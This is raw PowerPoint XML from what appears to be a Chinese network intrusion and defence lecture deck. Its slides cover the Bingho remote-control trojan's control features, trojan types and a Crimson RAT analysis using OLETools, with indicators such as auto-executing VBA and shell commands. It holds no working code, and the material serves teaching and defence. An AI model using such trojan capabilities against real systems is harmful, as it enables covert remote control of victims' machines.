            <a:ext cx="7272338" cy="5159375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86237525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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>管理对方的进程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133126" name="Picture 4" descr="8_5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1028700" y="1227138"/>
            <a:ext cx="7272338" cy="5146675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45517963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日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="6245225"/>
            <a:ext cx="1981200" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BC8CFBB4-EC2E-4836-BF2E-5E88C7C3F46A}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2021/11/28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6245225"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>网络入侵与防范讲义</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134148" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6245225"/>
            <a:ext cx="1981200" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A63ABCC6-6BEA-4922-9104-40CB220D9274}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>167</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134149" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制对方系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="134150" name="Picture 4" descr="8_6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="1528763"/>
            <a:ext cx="7416800" cy="5284787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18815465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日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="6245225"/>
            <a:ext cx="1981200" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{872A8A53-4109-4E19-A546-75B0D20287DC}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2021/11/28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6245225"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>网络入侵与防范讲义</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135172" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6245225"/>
            <a:ext cx="1981200" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{12ECAB12-D4D2-4A1B-8792-70969FE4380E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>168</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135173" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注册表管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="135174" name="Picture 4" descr="8_7_0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1509713"/>
            <a:ext cx="7343775" cy="5232400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30568350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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>甚至可以对桌面等其它信息设置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="136198" name="Picture 4" descr="8_7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="962025" y="1233488"/>
            <a:ext cx="7416800" cy="5064125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3146290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43047" y="1349211"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从木马形态上分，可以分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>有文件木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无文件木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有文件木马：木马本身是一个可执行文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无文件木马：木马不是一个可执行文件，需要依靠其它软件来触发执行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395655001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21" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰河的使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>总结</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137222" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>冰河几乎可以对入侵的计算机进行完全的控制，完全可以当作一个远程管理工具使用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172493630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09989" y="2790670"/>
            <a:ext cx="7064582" cy="958850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>二、木马实例（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Crimson </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148871650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90344" y="1101725"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一个简单的远程控制型木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）分析（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://malwr-analysis.com/2020/07 /24/crimson- rat-malware-analysis/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拓展</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1204694" y="3380828"/>
            <a:ext cx="6743700" cy="3228975"/>
            <a:chOff x="1496902" y="3443890"/>
            <a:chExt cx="6743700" cy="3228975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1777889" y="3443890"/>
              <a:ext cx="6181725" cy="590550"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1496902" y="4034440"/>
              <a:ext cx="6743700" cy="2638425"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2913295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11517" y="1286149"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>I am using OLETools to get the property of excel file: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd &gt; olemeta.py &lt;file name&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</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454" y="2948861"/>
            <a:ext cx="7390526" cy="2863615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15035612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11517" y="1286149"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Next OLETool command I am running is to get the OLE details: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd &gt; olevba.py -a &lt;filename&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Crimson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析</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206" y="2412125"/>
            <a:ext cx="6886994" cy="3888266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172931515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79986" y="1475335"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Suspicious Indicators:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>VBA code will auto execute on opening excel workbook.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Create directory on the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Write a file on the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Execute shell command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>hex string used for obfuscation.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
